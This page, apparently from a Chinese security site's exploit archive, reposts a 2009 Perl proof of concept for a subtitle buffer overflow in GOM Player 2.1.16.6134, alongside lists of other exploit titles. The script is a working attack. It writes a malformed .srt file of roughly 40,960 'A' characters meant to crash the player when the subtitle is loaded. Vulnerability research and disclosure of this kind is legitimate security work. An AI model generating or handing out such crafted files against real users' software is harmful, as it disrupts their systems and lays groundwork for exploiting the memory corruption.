首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GOM Player 2.1.16.6134 Subtitle Local Buffer Overflow PoC
来源:www.vfcocus.net 作者:Minh 发布时间:2009-04-09  
#!/usr/local/bin/perl

##################################################################
#
# Title : GOM Player Subtitle Buffer Overflow Vulnerabiltity
# Discovery by : Bui Quang Minh
# Tested : GOM Player 2.1.16.6134
# Reference : Bkis [http://security.bkis.vn/?p=501]
# PoC : Windows XP (Silently Crash) and Windows Vista, Windows 7.
#
##################################################################

my $buffer = "A" x 10240 x 4;
my $filename = "gomdos.srt";
open (FILE,">$filename") || die "\nCan't open $file: $!";
print FILE "$buffer";
close (FILE);
print "\nSuccessfully!\n\nPlease try $filename with a video file!\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel < 2.6.29 exit_not
·OTSTurntables 1.00.027 (.m3u/.
·peterConnects Web Server Trave
·OTSTurntables 1.00.027 (.ofl)
·SASPCMS 0.9 Multiple Remote Vu
·net2ftp versions 0.97 and belo
·XBMC 8.10 (HEAD) Remote Buffer
·Lanius CMS <= 0.5.2 Remote Arb
·Geeklog <= 1.5.2 SEC_authentic
·Family Connections CMS <= 1.8.
·Exjune Guestbook v2 Remote Dat
·Baby FTP server version 1.x re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved